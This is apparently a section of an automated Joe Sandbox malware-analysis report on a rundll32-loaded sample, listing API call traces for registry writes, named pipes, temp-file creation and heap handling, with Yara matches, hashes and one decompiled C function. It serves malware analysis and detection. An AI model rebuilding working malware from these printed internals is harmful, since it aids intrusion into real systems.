                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,?,?,00000000,?,?,?,?), ref: 0627DB4D
                                                          • HeapFree.KERNEL32(00000000,?,?), ref: 0627DB5A
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrlen$Heap$Free$Allocatelstrcpy
                                                          • String ID:
                                                          • API String ID: 904523553-0
                                                          • Opcode ID: 96fb89b0af158f84c6665e55bd5fd3bab262ad23c56ca119e0078a3e740b5093
                                                          • Instruction ID: 9c10774b0d824f131e5bca01b9218b58bd37518272918f5f19f8dc030283c30d
                                                          • Opcode Fuzzy Hash: 96fb89b0af158f84c6665e55bd5fd3bab262ad23c56ca119e0078a3e740b5093
                                                          • Instruction Fuzzy Hash: A941787291024AAFCF528FA4DC44EAE7BBAFF84310F148865FA15A7250D730A951DF60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06281FE9 Relevance: 18.1, APIs: 12, Instructions: 104synchronizationpipethreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0628201B
                                                          • WaitForSingleObject.KERNEL32(000005A0,00000000), ref: 0628203D
                                                          • ConnectNamedPipe.KERNEL32(?,?), ref: 0628205D
                                                          • GetLastError.KERNEL32 ref: 06282067
                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0628208B
                                                          • FlushFileBuffers.KERNEL32(?,?,00000001,00000000,?,?,?,00000010,00000000), ref: 062820CE
                                                          • DisconnectNamedPipe.KERNEL32(?,?,?,00000010,00000000), ref: 062820D7
                                                          • WaitForSingleObject.KERNEL32(00000000), ref: 062820E0
                                                          • CloseHandle.KERNEL32(?), ref: 062820F5
                                                          • GetLastError.KERNEL32 ref: 06282102
                                                          • CloseHandle.KERNEL32(?), ref: 0628210F
                                                          • RtlExitUserThread.NTDLL(000000FF), ref: 06282125
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Wait$CloseErrorHandleLastNamedObjectPipeSingle$BuffersConnectCreateDisconnectEventExitFileFlushMultipleObjectsThreadUser
                                                          • String ID:
                                                          • API String ID: 4053378866-0
                                                          • Opcode ID: a937e9931acf7fe4f30c82d29a745cf6924a6954492aaf07ef67263491d58616
                                                          • Instruction ID: daaafbe7be5be71e043476838c6dbb8b0cf4292dcde512b4086f4b976e80d4b7
                                                          • Opcode Fuzzy Hash: a937e9931acf7fe4f30c82d29a745cf6924a6954492aaf07ef67263491d58616
                                                          • Instruction Fuzzy Hash: B731A270516305EFD751AF24DC4895EBBAAFF89314F100A29FA65E20E0D7709A45CFE2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06284140 Relevance: 18.1, APIs: 12, Instructions: 95registrymemorystringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlImageNtHeader.NTDLL(?), ref: 06284151
                                                          • GetTempPathA.KERNEL32(00000000,00000000,?,?,062809CF,00000094,00000000,00000000,?), ref: 06284169
                                                          • RtlAllocateHeap.NTDLL(00000000,00000011), ref: 06284178
                                                          • GetTempPathA.KERNEL32(00000001,00000000,?,?,062809CF,00000094,00000000,00000000,?), ref: 0628418B
                                                          • GetTickCount.KERNEL32 ref: 0628418F
                                                          • wsprintfA.USER32 ref: 062841A6
                                                          • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 062841E1
                                                          • StrRChrA.SHLWAPI(00000000,00000000,?), ref: 06284201
                                                          • lstrlen.KERNEL32(00000000), ref: 0628420B
                                                          • RegSetValueExA.ADVAPI32(00000001,00000001,00000000,00000001,00000000,00000001), ref: 0628421B
                                                          • RegCloseKey.ADVAPI32(?), ref: 06284227
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,?), ref: 06284235
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: HeapPathTemp$AllocateCloseCountCreateFreeHeaderImageTickValuelstrlenwsprintf
                                                          • String ID:
                                                          • API String ID: 3778301466-0
                                                          • Opcode ID: 34ad5de67ed7902346a20da0ef38aa1da965f640bab806039de42afdf07e1677
                                                          • Instruction ID: 54009534aef643de37001d2704d75a5415df1998bcd861067371e55a2a8c03db
                                                          • Opcode Fuzzy Hash: 34ad5de67ed7902346a20da0ef38aa1da965f640bab806039de42afdf07e1677
                                                          • Instruction Fuzzy Hash: EA3167B1901219BFDB01AFA5EC8CDAF7BAEEF89359B044025FA05D7100D6348A55DFB0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06275093 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120memorythreadstringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlImageNtHeader.NTDLL(00000000), ref: 062750BD
                                                          • GetCurrentThreadId.KERNEL32 ref: 062750D3
                                                          • GetCurrentThread.KERNEL32 ref: 062750E4
                                                            • Part of subcall function 0628508C: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,76C85520,?,?,?,06275112,00000000,?,00000000,00000000,?), ref: 0628509E
                                                            • Part of subcall function 0628508C: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,06275112,00000000,?,00000000,00000000,?), ref: 062850B7
                                                            • Part of subcall function 0628508C: GetCurrentThreadId.KERNEL32 ref: 062850C4
                                                            • Part of subcall function 0628508C: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,06275112,00000000,?,00000000,00000000,?), ref: 062850D0
                                                            • Part of subcall function 0628508C: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,06275112,00000000,?,00000000,00000000,?), ref: 062850DE
                                                            • Part of subcall function 0628508C: lstrcpy.KERNEL32(00000000), ref: 06285100
                                                            • Part of subcall function 06290551: lstrlen.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,00000000,76C85520,00000000,?,0627512E,00000020,00000000,?,00000000), ref: 062905BC
                                                            • Part of subcall function 06290551: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000001,00000000,00000000,76C85520,00000000,?,0627512E,00000020,00000000,?,00000000), ref: 062905E4
                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,00000020,00000000,?,00000000,?,00000000,00000000,?), ref: 0627515E
                                                          • HeapFree.KERNEL32(00000000,?,00000020,00000000,?,00000000,?,00000000,00000000,?), ref: 0627516A
                                                          • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 062751B9
                                                          • wsprintfA.USER32 ref: 062751D1
                                                          • lstrlen.KERNEL32(00000000,00000000), ref: 062751DC
                                                          • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 062751F3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Heap$Free$CurrentTempThread$FilePathTimelstrlen$AllocateHeaderImageNameSystemlstrcpywsprintf
                                                          • String ID: W
                                                          • API String ID: 630447368-655174618
                                                          • Opcode ID: 0d26b2a28b68257f3af5f44f25518cbbc2ca2073f82366057c6c678249c63326
                                                          • Instruction ID: 4f292ee7a59c6d73c23223cb77c90a2897fe00925788fb66bfbb0393de1d409f
                                                          • Opcode Fuzzy Hash: 0d26b2a28b68257f3af5f44f25518cbbc2ca2073f82366057c6c678249c63326
                                                          • Instruction Fuzzy Hash: 1E415B70A11219BFDB529FA1EC48DAEBFBAFF89745B044025FA04A6110DB349654DFB0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0628B804 Relevance: 16.7, APIs: 11, Instructions: 157registrystringfileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 0628B82F
                                                            • Part of subcall function 0628447B: RegCloseKey.ADVAPI32(?,?), ref: 06284502
                                                          • RegOpenKeyA.ADVAPI32(80000001,06284833,?), ref: 0628B86A
                                                          • lstrcpyW.KERNEL32(-00000002,94E85600), ref: 0628B8CC
                                                          • lstrcatW.KERNEL32(00000000,?), ref: 0628B8E1
                                                          • lstrcpyW.KERNEL32(?), ref: 0628B8FB
                                                          • lstrcatW.KERNEL32(00000000,?), ref: 0628B90A
                                                            • Part of subcall function 0628452B: lstrlenW.KERNEL32(?,?,?,0627E51D,?,?,?,?,00001000,?,?,00001000), ref: 0628453E
                                                            • Part of subcall function 0628452B: lstrlen.KERNEL32(?,?,0627E51D,?,?,?,?,00001000,?,?,00001000), ref: 06284549
                                                            • Part of subcall function 0628452B: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 0628455E
                                                          • RegCloseKey.ADVAPI32(06284833,?,?,06284833), ref: 0628B974
                                                            • Part of subcall function 0627C2AA: lstrlenW.KERNEL32(00000000,00000000,00000000,00000000,?,?,0627171E,?,?,00000000,?), ref: 0627C2B6
                                                            • Part of subcall function 0627C2AA: memcpy.NTDLL(00000000,00000000,00000000,00000002,?,?,0627171E,?,?,00000000,?), ref: 0627C2DE
                                                            • Part of subcall function 0627C2AA: memset.NTDLL ref: 0627C2F0
                                                          • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000,00000000,?,00000000,?,?,?,06284833), ref: 0628B9A9
                                                          • GetLastError.KERNEL32(?,?,06284833), ref: 0628B9B4
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,06284833), ref: 0628B9CA
                                                          • RegCloseKey.ADVAPI32(?,00000000,?,00000000,?,?,?,06284833), ref: 0628B9DC
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Closelstrlen$HeapOpenlstrcatlstrcpy$AllocateCreateErrorFileFreeLastmemcpymemset
                                                          • String ID:
                                                          • API String ID: 1430934453-0
                                                          • Opcode ID: 231ddbb614cca0fedc545b639d98daa04c530ed4fb18030d20d95de8d42fb6f7
                                                          • Instruction ID: f60f525f88f31b6a684f161748ddb1730016f463f1a12b589bd9d7cf684ad75d
                                                          • Opcode Fuzzy Hash: 231ddbb614cca0fedc545b639d98daa04c530ed4fb18030d20d95de8d42fb6f7
                                                          • Instruction Fuzzy Hash: DC517F7191130AFFDB51EFA4EC48EAE77BAEF88301B044459EE04A7190E7309A01DFA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036D62F6 Relevance: 16.6, APIs: 11, Instructions: 145stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 55%
                                                          			E036D62F6(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, WCHAR** _a16, WCHAR** _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				WCHAR* _v24;
				signed int _v28;
				intOrPtr _v32;
				void* __edi;
				void* __esi;
				WCHAR* _t58;
				signed int _t60;
				signed int _t62;
				intOrPtr _t64;
				intOrPtr _t66;
				intOrPtr _t70;
				void* _t72;
				void* _t75;
				void* _t76;
				WCHAR* _t80;
				WCHAR* _t83;
				void* _t84;
				void* _t85;
				void* _t86;
				intOrPtr _t92;
				signed int _t103;
				void* _t104;
				intOrPtr _t105;
				void* _t107;
				intOrPtr* _t115;
				void* _t119;
				WCHAR* _t125;

				_t58 =  *0x36da3dc; // 0x5969c18
				_v24 = _t58;
				_v28 = 8;
				_v20 = GetTickCount();
				_t60 = E036D7367();
				_t103 = 5;
				_t98 = _t60 % _t103 + 6;
				_t62 = E036D7367();
				_t117 = _t62 % _t103 + 6;
				_v32 = _t62 % _t103 + 6;
				_t64 = E036D117A(_t60 % _t103 + 6);
				_v16 = _t64;
				if(_t64 != 0) {
					_t66 = E036D117A(_t117);
					_v12 = _t66;
					if(_t66 != 0) {
						_push(5);
						_t104 = 0xa;
						_t119 = E036D67E7(_t104,  &_v20);
						if(_t119 == 0) {
							_t119 = 0x36d918c;
						}
						_t70 = E036D659E(_v24);
						_v8 = _t70;
						if(_t70 != 0) {
							_t115 = __imp__;
							_t72 =  *_t115(_t119);
							_t75 =  *_t115(_v8);
							_t76 =  *_t115(_a4);
							_t80 = E036D6D63(lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76 + lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76);
							_v24 = _t80;
							if(_t80 != 0) {
								_t105 =  *0x36da348; // 0x228d5a8
								_t28 = _t105 + 0x36dbb30; // 0x530025
								wsprintfW(_t80, _t28, _t119, _t119, _v16, _v12, _v12, _v16, _a4, _v8, _a8);
								_push(4);
								_t107 = 5;
								_t83 = E036D67E7(_t107,  &_v20);
								_a8 = _t83;
								if(_t83 == 0) {
									_a8 = 0x36d9190;
								}
								_t84 =  *_t115(_a8);
								_t85 =  *_t115(_v8);
								_t86 =  *_t115(_a4);
								_t125 = E036D6D63(lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + 0x13a);
								if(_t125 == 0) {
									E036D6C2C(_v24);
								} else {
									_t92 =  *0x36da348; // 0x228d5a8
									_t44 = _t92 + 0x36dbca8; // 0x73006d
									wsprintfW(_t125, _t44, _a8, _a8, _a4, _v8, _a12);
									 *_a16 = _v24;
									_v28 = _v28 & 0x00000000;
									 *_a20 = _t125;
								}
							}
							E036D6C2C(_v8);
						}
						E036D6C2C(_v12);
					}
					E036D6C2C(_v16);
				}
				return _v28;
			}


































                                                          0x036d62fc
                                                          0x036d6304
                                                          0x036d6307
                                                          0x036d6314
                                                          0x036d6317
                                                          0x036d631e
                                                          0x036d6325
                                                          0x036d6328
                                                          0x036d6335
                                                          0x036d6338
                                                          0x036d633b
                                                          0x036d6340
                                                          0x036d6345
                                                          0x036d634d
                                                          0x036d6352
                                                          0x036d6357
                                                          0x036d635d
                                                          0x036d6361
                                                          0x036d636a
                                                          0x036d636e
                                                          0x036d6370
                                                          0x036d6370
                                                          0x036d6378
                                                          0x036d637d
                                                          0x036d6382
                                                          0x036d6388
                                                          0x036d638f
                                                          0x036d63a0
                                                          0x036d63a7
                                                          0x036d63b9
                                                          0x036d63be
                                                          0x036d63c3
                                                          0x036d63cc
                                                          0x036d63de
                                                          0x036d63f4
                                                          0x036d63f9
                                                          0x036d63fd
                                                          0x036d6401
                                                          0x036d6406
                                                          0x036d640b
                                                          0x036d640d
                                                          0x036d640d
                                                          0x036d6417
                                                          0x036d6420
                                                          0x036d6427
                                                          0x036d6443
                                                          0x036d6447
                                                          0x036d6480
                                                          0x036d6449
                                                          0x036d644c
                                                          0x036d6454
                                                          0x036d6465
                                                          0x036d646d
                                                          0x036d6475
                                                          0x036d6479
                                                          0x036d6479
                                                          0x036d6447
                                                          0x036d6488
                                                          0x036d6488
                                                          0x036d6490
                                                          0x036d6490
                                                          0x036d6498
                                                          0x036d6498
                                                          0x036d64a4

                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 036D630E
                                                          • lstrlen.KERNEL32(00000000,00000005), ref: 036D638F
                                                          • lstrlen.KERNEL32(?), ref: 036D63A0
                                                          • lstrlen.KERNEL32(00000000), ref: 036D63A7
                                                          • lstrlenW.KERNEL32(80000002), ref: 036D63AE
                                                          • wsprintfW.USER32 ref: 036D63F4
                                                          • lstrlen.KERNEL32(?,00000004), ref: 036D6417
                                                          • lstrlen.KERNEL32(?), ref: 036D6420
                                                          • lstrlen.KERNEL32(?), ref: 036D6427
                                                          • lstrlenW.KERNEL32(?), ref: 036D642E
                                                          • wsprintfW.USER32 ref: 036D6465
                                                            • Part of subcall function 036D6C2C: RtlFreeHeap.NTDLL(00000000,00000000,036D5E1D,00000000,?,?,00000000), ref: 036D6C38
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$wsprintf$CountFreeHeapTick
                                                          • String ID:
                                                          • API String ID: 822878831-0
                                                          • Opcode ID: cef969b8fff6dba5308e606be0c30bac902b53a12348e6945d58dcd4168ad666
                                                          • Instruction ID: e2eff15d565545a055c75ae377c9752622801945e7caf15523e13fbce2aef5f1
                                                          • Opcode Fuzzy Hash: cef969b8fff6dba5308e606be0c30bac902b53a12348e6945d58dcd4168ad666
                                                          • Instruction Fuzzy Hash: 88517E76D00219ABCF11EFA4DC44ADE7FB5EF48314F058069E904AB250DB35CA25DFA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06285353 Relevance: 16.6, APIs: 11, Instructions: 144memoryregistryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 06285389
                                                          • RtlAllocateHeap.NTDLL(00000000,00000104), ref: 0628539E
                                                          • RegCreateKeyA.ADVAPI32(80000001,?), ref: 062853C6
                                                          • HeapFree.KERNEL32(00000000,?), ref: 06285407
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 06285417
                                                          • RtlAllocateHeap.NTDLL(00000000,0627DA9D), ref: 0628542A
                                                          • RtlAllocateHeap.NTDLL(00000000,0627DA9D), ref: 06285439
                                                          • HeapFree.KERNEL32(00000000,00000000,?,0627DA9D,00000000,?,?,?), ref: 06285483
                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,0627DA9D,00000000,?,?,?,?), ref: 062854A7
                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0627DA9D,00000000,?,?,?), ref: 062854CC
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,0627DA9D,00000000,?,?,?), ref: 062854E1
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Heap$Free$Allocate$CloseCreate
                                                          • String ID:
                                                          • API String ID: 4126010716-0
                                                          • Opcode ID: 0be35be34caf38aee336e92a6969e3b091cd7f1042d4d2381923a493684f4396
                                                          • Instruction ID: eaaecec2a1998a064306e34dd659ad69aaa658ffc674428d7cbef2db65c30445
                                                          • Opcode Fuzzy Hash: 0be35be34caf38aee336e92a6969e3b091cd7f1042d4d2381923a493684f4396
                                                          • Instruction Fuzzy Hash: AE51E275D1120AEFDF419F94EC889EEBBBAFF48355F10446AEA04B2120D3355A94DF60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0627CEC3 Relevance: 16.6, APIs: 11, Instructions: 121memorystringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • PathFindFileNameW.SHLWAPI(?), ref: 0627CEDD
                                                          • PathFindFileNameW.SHLWAPI(?), ref: 0627CEF3
                                                          • lstrlenW.KERNEL32(00000000), ref: 0627CF36
                                                          • RtlAllocateHeap.NTDLL(00000000,0629350B), ref: 0627CF4C
                                                          • memcpy.NTDLL(00000000,00000000,06293509), ref: 0627CF5F
                                                          • _wcsupr.NTDLL ref: 0627CF6B
                                                          • lstrlenW.KERNEL32(?,06293509), ref: 0627CFA4
                                                          • RtlAllocateHeap.NTDLL(00000000,?,06293509), ref: 0627CFB9
                                                          • lstrcpyW.KERNEL32(00000000,?), ref: 0627CFCF
                                                          • lstrcatW.KERNEL32(00000000,?), ref: 0627CFF5
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 0627D004
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Heap$AllocateFileFindNamePathlstrlen$Free_wcsuprlstrcatlstrcpymemcpy
                                                          • String ID:
                                                          • API String ID: 3868788785-0
                                                          • Opcode ID: 8890c84c3d51aeadb69ac1b6f81065fd8207b9e8a1f3b38294950155a7795891
                                                          • Instruction ID: d3b7e383bba0d035fc44d6858a928eeae2ff11f16ce9d5895b57e81225a2581b
                                                          • Opcode Fuzzy Hash: 8890c84c3d51aeadb69ac1b6f81065fd8207b9e8a1f3b38294950155a7795891
                                                          • Instruction Fuzzy Hash: C431C232B20315AFC7615E74AC8CE2F7BAAEF89761B14051AFE15E2140DB3198458FA2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0627161A Relevance: 16.6, APIs: 11, Instructions: 102registrymemorystringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 0627163E
                                                            • Part of subcall function 0628447B: RegCloseKey.ADVAPI32(?,?), ref: 06284502
                                                          • lstrcmpiW.KERNEL32(?,?,?,?,00000000,?,00000000,?), ref: 0627166D
                                                          • lstrlenW.KERNEL32(?,?,?,00000000,?,00000000,?), ref: 0627167E
                                                          • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 062716B8
                                                          • RegSetValueExA.ADVAPI32(?,?,00000000,00000004,?,00000004,?,00000000,?), ref: 062716DA
                                                          • RegCloseKey.ADVAPI32(?,?,00000000,?), ref: 062716E3
                                                          • RtlEnterCriticalSection.NTDLL(00000000), ref: 062716F9
                                                          • HeapFree.KERNEL32(00000000,?,?,00000000,?), ref: 0627170E
                                                          • RtlLeaveCriticalSection.NTDLL(00000000), ref: 06271722
                                                          • HeapFree.KERNEL32(00000000,?,?,00000000,?), ref: 06271737
                                                          • RegCloseKey.ADVAPI32(?,?,00000000,?), ref: 06271740
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Close$CriticalFreeHeapSection$CreateEnterLeaveOpenValuelstrcmpilstrlen
                                                          • String ID:
                                                          • API String ID: 534682438-0
                                                          • Opcode ID: 5e97b073d2ddcec5f770be1bac556fcb3cea054366b7946a69f72626bf30231d
                                                          • Instruction ID: 85b7cf88c918c8ff2f5dd0311a4acfd63986552a4a51edba1b5171923c8bbdc2
                                                          • Opcode Fuzzy Hash: 5e97b073d2ddcec5f770be1bac556fcb3cea054366b7946a69f72626bf30231d
                                                          • Instruction Fuzzy Hash: 63313C71A10205FFCB129FA8EC8DD9E7BBAFF89341B184115FA05E6010E3319A55DF60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 062833CD Relevance: 16.6, APIs: 11, Instructions: 80memoryfileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 062833E4
                                                          • GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,06280B6B,00000094,00000000,00000001,00000094,00000000,00000000,?,0627C1F8,00000000,00000094), ref: 062833F6
                                                          • StrChrA.SHLWAPI(00000000,0000003A,?,00000000,?,06280B6B,00000094,00000000,00000001,00000094,00000000,00000000,?,0627C1F8,00000000,00000094), ref: 06283403
                                                          • wsprintfA.USER32 ref: 0628341E
                                                          • CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000,00000000,?,0627C1F8,00000000,00000094,00000000), ref: 06283434
                                                          • GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 0628344D
                                                          • WriteFile.KERNEL32(00000000,00000000), ref: 06283455
                                                          • GetLastError.KERNEL32 ref: 06283463
                                                          • CloseHandle.KERNEL32(00000000), ref: 0628346C
                                                          • GetLastError.KERNEL32(?,00000000,?,06280B6B,00000094,00000000,00000001,00000094,00000000,00000000,?,0627C1F8,00000000,00000094,00000000), ref: 0628347D
                                                          • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,06280B6B,00000094,00000000,00000001,00000094,00000000,00000000,?,0627C1F8,00000000,00000094), ref: 0628348D
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorFileHandleHeapLast$AllocateCloseCreateDirectoryFreeModuleWindowsWritewsprintf
                                                          • String ID:
                                                          • API String ID: 3873609385-0
                                                          • Opcode ID: 4a5ef6066cf12e1e901700133bdbc0c3dc46e85fa74109b4c261242844d02a80
                                                          • Instruction ID: 5ce73cf4347cd155c23e5801360bfe5631806bc11543d04d50522e8d6fa8403b
                                                          • Opcode Fuzzy Hash: 4a5ef6066cf12e1e901700133bdbc0c3dc46e85fa74109b4c261242844d02a80
                                                          • Instruction Fuzzy Hash: DB11A5716523587FE3127B65BC8CF7B3B9DEBCA669B040124FE06E2180DA510C49CAB1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06277FFF Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112memorystringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • StrChrA.SHLWAPI(00000000,0000002C,765BD3B0,00000000,76C85520,76CDF710), ref: 06278030
                                                          • StrChrA.SHLWAPI(00000001,0000002C), ref: 06278043
                                                          • StrTrimA.SHLWAPI(00000000,?), ref: 06278066
                                                          • StrTrimA.SHLWAPI(00000001,?), ref: 06278075
                                                          • lstrlen.KERNEL32(00000000), ref: 062780AA
                                                          • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 062780BD
                                                          • lstrcpy.KERNEL32(00000004,00000000), ref: 062780DB
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 062780FF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: HeapTrim$AllocateFreelstrcpylstrlen
                                                          • String ID: W
                                                          • API String ID: 1974185407-655174618
                                                          • Opcode ID: 30996ace02609b089d8b3ca2c7214c09d1fae9262533f27766ea6ba57655180a
                                                          • Instruction ID: 53f26ae656fa2bd170d26bcc1729a8e3d74a09c9ed94cf030120594f8f627faa
                                                          • Opcode Fuzzy Hash: 30996ace02609b089d8b3ca2c7214c09d1fae9262533f27766ea6ba57655180a
                                                          • Instruction Fuzzy Hash: FC31AF31920319FFDF519F68DC4CE9A7BB9EF88740F14802AFA1897600D6789940CFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06283C97 Relevance: 15.2, APIs: 10, Instructions: 186stringmemoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlen.KERNEL32(0689C1E8,00000000,00000000,00000000,?), ref: 06283CBA
                                                          • lstrlen.KERNEL32(?,00000000,00000000,00000000,?), ref: 06283CC9
                                                          • lstrlen.KERNEL32(?,00000000,00000000,00000000,?), ref: 06283CD6
                                                          • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 06283CEE
                                                          • lstrlen.KERNEL32(?,00000000,00000000,00000000,?), ref: 06283CFA
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 06283D16
                                                          • wsprintfA.USER32 ref: 06283DF8
                                                          • memcpy.NTDLL(00000000,00004000,?), ref: 06283E45
                                                          • InterlockedExchange.KERNEL32(0629A128,00000000), ref: 06283E63
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 06283EA4
                                                            • Part of subcall function 0628E3CD: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 0628E3F6
                                                            • Part of subcall function 0628E3CD: memcpy.NTDLL(00000000,?,?), ref: 0628E409
